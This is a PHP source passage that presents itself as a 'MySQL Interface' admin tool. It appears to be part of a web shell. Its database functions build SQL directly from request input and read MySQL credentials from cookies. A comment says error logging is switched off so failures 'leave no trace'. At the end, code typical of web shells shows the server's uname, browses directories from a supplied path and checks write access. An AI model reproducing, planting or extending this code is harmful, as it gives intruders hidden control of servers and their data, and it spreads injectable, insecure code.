<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>


<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>

<p>';

    if( $cmd == "add" )
        echo "<input type=submit value='Add Field'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Field'>\n";
    echo "<input type=button value=Cancel onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageField_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
        $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;

    if( $cmd == "add" )
        $queryStr = "ALTER TABLE $tablename ADD $name ";
    else if( $cmd == "edit" )
        $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
   
    if( $M != "" )
        if( $D != "" )
            $queryStr .= "$type($M,$D) ";
        else
            $queryStr .= "$type($M) ";
    else if( $valuelist != "" ) {
        $valuelist = stripslashes( $valuelist );
        $queryStr .= "$type($valuelist) ";
    } else
        $queryStr .= "$type ";

    $queryStr .= "$unsigned $zerofill $binary ";

    if( $default_value != "" )
        $queryStr .= "DEFAULT '$default_value' ";
   
    $queryStr .= "$not_null $auto_increment";

    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    // key change
    $keyChange = false;
    $result = mysql_query( "SHOW KEYS FROM $tablename" );
    $primary = "";
    while( $row = mysql_fetch_array($result) )
        if( $row["Key_name"] == "PRIMARY" ) {
            if( $row[Column_name] == $name )
                $keyChange = true;
            else
                $primary .= ", $row[Column_name]";
        }
    if( $primary_key == "PRIMARY KEY" ) {
        $primary .= ", $name";
        $keyChange = !$keyChange;
    }
    $primary = substr( $primary, 2 );
    if( $keyChange == true ) {
        $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();
        $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();
    }

    viewSchema();
}

function dropField() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewSchema();
}

function viewData( $queryStr ) {
    global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;

    echo "<h1>Data in Table</h1>\n";
    if( $tablename != "" )
        echo "<p class=location>$dbname > $tablename</p>\n";
    else
        echo "<p class=location>$dbname</p>\n";

    $queryStr = stripslashes( $queryStr );
    if( $queryStr == "" ) {
        $queryStr = "SELECT * FROM $tablename";
        if( $orderby != "" )
            $queryStr .= " ORDER BY $orderby";
        echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
    }

    $pResult = mysql_db_query( $dbname, $queryStr );
    $fieldt = mysql_fetch_field($pResult);
    $tablename = $fieldt->table;
    $errMsg = mysql_error();

    $GLOBALS[queryStr] = $queryStr;

    if( $pResult == false ) {
        echoQueryResult();
        return;
    }
    if( $pResult == 1 ) {
        $errMsg = "Success";
        echoQueryResult();
        return;
    }

    echo "<hr>\n";

    $row = mysql_num_rows( $pResult );
    $col = mysql_num_fields( $pResult );

    if( $row == 0 ) {
        echo "No Data Exist!";
        return;
    }
   
    if( $rowperpage == "" ) $rowperpage = 30;
    if( $page == "" ) $page = 0;
    else $page--;
    mysql_data_seek( $pResult, $page * $rowperpage );

    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    for( $i = 0; $i < $col; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        echo "<th>";
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
        else
            echo "<font    style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
        echo "</th>\n";
    }
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";

    for( $i = 0; $i < $rowperpage; $i++ ) {
        $rowArray = mysql_fetch_row( $pResult );
        if( $rowArray == false ) break;
        echo "<tr>\n";
        $key = "";
        for( $j = 0; $j < $col; $j++ ) {
            $data = $rowArray[$j];

            $field = mysql_fetch_field( $pResult, $j );
            if( $field->primary_key == 1 )
                $key .= "&" . $field->name . "=" . $data;

            if( strlen( $data ) > 30 )
                $data = substr( $data, 0, 30 ) . "...";
            $data = htmlspecialchars( $data );
            echo "<td>\n";
            echo "$data\n";
            echo "</td>\n";
        }
        
        if( $key == "" )
            echo "<td colspan=2>no Key</td>\n";
        else {
            echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
            echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
        }
        echo "</tr>\n";
    }
    echo "</table>\n";

    echo "<font size=2>\n";
    if($action == "viewData")
        echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
    else
        echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
    echo "<font color=green>\n";
    echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
    echo "</font>\n";
    echo " | ";
    if( $page > 0 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Prev</a>\n";
    } else
        echo "Prev";
    echo " | ";
    if( $page < ($row/$rowperpage)-1 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Next</a>\n";
    } else
        echo "Next";
    echo " | ";
    if( $row > $rowperpage ) {
        echo "<input type=text size=4 name=page>\n";
        echo "<input type=submit value='Go'>\n";
    }
    echo "</form>\n";
    echo "</font>\n";
}

function manageData( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Data</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Data</h1>\n";
        $pResult = mysql_list_fields( $dbname, $tablename );
        $num = mysql_num_fields( $pResult );
   
        $key = "";
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            if( $field->primary_key == 1 )
                if( $field->numeric == 1 )
                    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
                else
                    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
        }
        $key = substr( $key, 0, strlen($key)-4 );

        mysql_select_db( $dbname, $mysqlHandle );
        $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
        $data = mysql_fetch_array( $pResult );
    }

    echo "<p class=location>$dbname > $tablename</p>\n";

    echo "<form action='$PHP_SELF' method=post>\n";
    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addData_submit>\n";
    else if( $cmd == "edit" )
        echo "<input type=hidden name=action value=editData_submit>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";
    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    echo "<th>Name</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Function</th>\n";
    echo "<th>Data</th>\n";
    echo "</tr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    $pResultLen = mysql_list_fields( $dbname, $tablename );

    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        $fieldname = $field["Field"];
        $fieldtype = $field["Type"];
        $len = mysql_field_len( $pResultLen, $i );

        echo "<tr>";
        echo "<td>$fieldname</td>";
        echo "<td>".$field["Type"]."</td>";
        echo "<td>\n";
        echo "<select name=${fieldname}_function>\n";
        echo "<option>\n";
        echo "<option>ASCII\n";
        echo "<option>CHAR\n";
        echo "<option>SOUNDEX\n";
        echo "<option>CURDATE\n";
        echo "<option>CURTIME\n";
        echo "<option>FROM_DAYS\n";
        echo "<option>FROM_UNIXTIME\n";
        echo "<option>NOW\n";
        echo "<option>PASSWORD\n";
        echo "<option>PERIOD_ADD\n";
        echo "<option>PERIOD_DIFF\n";
        echo "<option>TO_DAYS\n";
        echo "<option>USER\n";
        echo "<option>WEEKDAY\n";
        echo "<option>RAND\n";
        echo "</select>\n";
        echo "</td>\n";
        $value = htmlspecialchars($data[$i]);
        if( $cmd == "add" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
            }
        } else if( $cmd == "edit" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    if( $value == $str )
                        echo "<option selected>$str\n";
                    else
                        echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
            }
        }
        echo "</tr>";
    }
    echo "</table><p>\n";
    if( $cmd == "add" )
        echo "<input type=submit value='Add Data'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Data'>\n";
    echo "<input type=button value='Cancel' onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageData_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    mysql_select_db( $dbname, $mysqlHandle );
    if( $cmd == "add" )
        $queryStr = "INSERT INTO $tablename VALUES (";
    else if( $cmd == "edit" )
        $queryStr = "REPLACE INTO $tablename VALUES (";
    for( $i = 0; $i < $num-1; $i++ ) {
        $field = mysql_fetch_field( $pResult );
        $func = $GLOBALS[$field->name."_function"];
        if( $func != "" )
            $queryStr .= " $func(";
        if( $field->numeric == 1 ) {
            $queryStr .= $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "),";
            else
                $queryStr .= ",";
        } else {
            $queryStr .= "'" . $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "'),";
            else
                $queryStr .= "',";
        }
    }
    $field = mysql_fetch_field( $pResult );
    if( $field->numeric == 1 )
        $queryStr .= $GLOBALS[$field->name] . ")";
    else
        $queryStr .= "'" . $GLOBALS[$field->name] . "')";

    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function deleteData() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    $key = "";
    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        if( $field->primary_key == 1 )
            if( $field->numeric == 1 )
                $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
            else
                $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
    }
    $key = substr( $key, 0, strlen($key)-4 );

    mysql_select_db( $dbname, $mysqlHandle );
    $queryStr =  "DELETE FROM $tablename WHERE $key";
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function fetch_table_dump_sql($table)
{
    global $mysqlHandle,$dbname;
   
    mysql_select_db( $dbname, $mysqlHandle );
    $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
    $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
    $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";

    echo $tabledump;

    // get data
    $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
    $numfields=mysql_num_fields($rows);
    while ($row = mysql_fetch_array($rows, MYSQL_NUM))
    {
        $tabledump = "INSERT INTO $table VALUES(";

        $fieldcounter = -1;
        $firstfield = 1;
        // get each field's data
        while (++$fieldcounter < $numfields)
        {
            if (!$firstfield)
            {
                $tabledump .= ', ';
            }
            else
            {
                $firstfield = 0;
            }

            if (!isset($row["$fieldcounter"]))
            {
                $tabledump .= 'NULL';
            }
            else
            {
                $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
            }
        }

        $tabledump .= ");\n";

        echo $tabledump;

    }
    @mysql_free_result($rows);
}

function dump() {
    global $mysqlHandle, $action, $dbname, $tablename;

    if( $action == "dumpTable" ){

        header("Content-disposition: filename=$tablename.sql");
        header('Content-type: unknown/unknown');
        fetch_table_dump_sql($tablename);
        echo "\n\n\n";
        echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
        exit;       
               
    }else{
        header("Content-disposition: filename=$dbname.sql");
        header('Content-type: unknown/unknown');
       
        mysql_select_db( $dbname, $mysqlHandle );
        $query_id = mysql_query("SHOW tables",$mysqlHandle);
        while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
        {
                fetch_table_dump_sql($row[0]);
                echo "\n\n\n";
                echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
                echo "\n\n\n";
        }
        echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
        exit;       

    }

}

function utils() {
    global $PHP_SELF, $command;
    echo "<h1>Utilities</h1>\n";
    if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
        echo "<hr>\n";
        echo "Show\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
        echo "</ul>\n";
        echo "Flush\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
        if( $command == "flush_hosts" ) {
            if( mysql_query( "Flush hosts" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
        if( $command == "flush_logs" ) {
            if( mysql_query( "Flush logs" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
        if( $command == "flush_privileges" ) {
            if( mysql_query( "Flush privileges" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
        if( $command == "flush_tables" ) {
            if( mysql_query( "Flush tables" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
        if( $command == "flush_status" ) {
            if( mysql_query( "Flush status" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "</ul>\n";
    } else {
        $queryStr = ereg_replace( "_", " ", $command );
        $pResult = mysql_query( $queryStr );
        if( $pResult == false ) {
            echo "Fail";
            return;
        }
        $col = mysql_num_fields( $pResult );

        echo "<p class=location>$queryStr</p>\n";
        echo "<hr>\n";

        echo "<table cellspacing=1 cellpadding=2 border=0>\n";
        echo "<tr>\n";
        for( $i = 0; $i < $col; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            echo "<th>".$field->name."</th>\n";
        }
        echo "</tr>\n";

        while( 1 ) {
            $rowArray = mysql_fetch_row( $pResult );
            if( $rowArray == false ) break;
            echo "<tr>\n";
            for( $j = 0; $j < $col; $j++ )
                echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
            echo "</tr>\n";
        }
        echo "</table>\n";
    }
}

function header_html() {
    global $PHP_SELF;
   
echo '
<html>
<head>
<title>MySQL Interface</title>
<style type="text/css">
<!--
p.location {
    color: #11bb33;
    font-size: small;
}
h1 {
    color: #A4A260;
}
th {
    background-color: #BDBE42;
    color: #FFFFFF;
    font-size: x-small;
}
td {
    background-color: #DEDFA5;
    font-size: x-small;
}
form {
    margin-top: 0;
    margin-bottom: 0;
}
a {
    text-decoration:none;
    color: #848200;
    font-size:x-small;
}
a:link {
}
a:hover {
    background-color:#EEEFD5;
    color:#646200;
    text-decoration:none              
}
//-->
</style>
</head>
<body>
';
}

function footer_html() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

    echo "<hr>\n";
    echo "<font size=2 color=blue>[$USERNAME]</font> - \n";

    echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
    if( $tablename != "" )
        echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
    echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
    echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
    echo "</font>\n";
    echo "</body>\n";
    echo "</html>\n";
}




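//------------- MAIN ------------- //
// Error display and error logging are both switched off, so failures in this
// script leave no trace in the PHP error log.
error_reporting(0);
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);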

if( $action == "logon" || $action == "" || $action == "logout" )
    logon();
else if( $action == "logon_submit" )
    logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
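    // The MySQL host, user name and password are read back from the
    // mysql_web_admin_* cookies on every request.
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {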
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    }
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    dump();
} else {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    }
    echo "<!--";
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    echo "-->";

    if( $mysqlHandle == false ) {
        echo "<html>\n";
        echo "<head>\n";
        echo "<title>MySQL Interface</title>\n";
        echo "</head>\n";
        echo "<body>\n";
        echo "<table width=100% height=100%><tr><td><center>\n";
        echo "<h1>Wrong Password!</h1>\n";
        echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
        echo "</center></td></tr></table>\n";
        echo "</body>\n";
        echo "</html>\n";
    } else {
        header_html();
        if( $action == "listDBs" )
            listDatabases();
        else if( $action == "createDB" )
            createDatabase();
        else if( $action == "dropDB" )
            dropDatabase();
        else if( $action == "listTables" )
            listTables();
        else if( $action == "createTable" )
            createTable();
        else if( $action == "dropTable" )
            dropTable();
        else if( $action == "viewSchema" )
            viewSchema();
        else if( $action == "query" )
            viewData( $queryStr );
        else if( $action == "addField" )
            manageField( "add" );
        else if( $action == "addField_submit" )
            manageField_submit( "add" );
        else if( $action == "editField" )
            manageField( "edit" );
        else if( $action == "editField_submit" )
            manageField_submit( "edit" );
        else if( $action == "dropField" )
            dropField();
        else if( $action == "viewData" )
            viewData( "" );
        else if( $action == "addData" )
            manageData( "add" );
        else if( $action == "addData_submit" )
            manageData_submit( "add" );
        else if( $action == "editData" )
            manageData( "edit" );
        else if( $action == "editData_submit" )
            manageData_submit( "edit" );
        else if( $action == "deleteData" )
            deleteData();
        else if( $action == "utils" )
            utils();

        mysql_close( $mysqlHandle);
        footer_html();
    }
}
?>
<p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p>
<?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
?>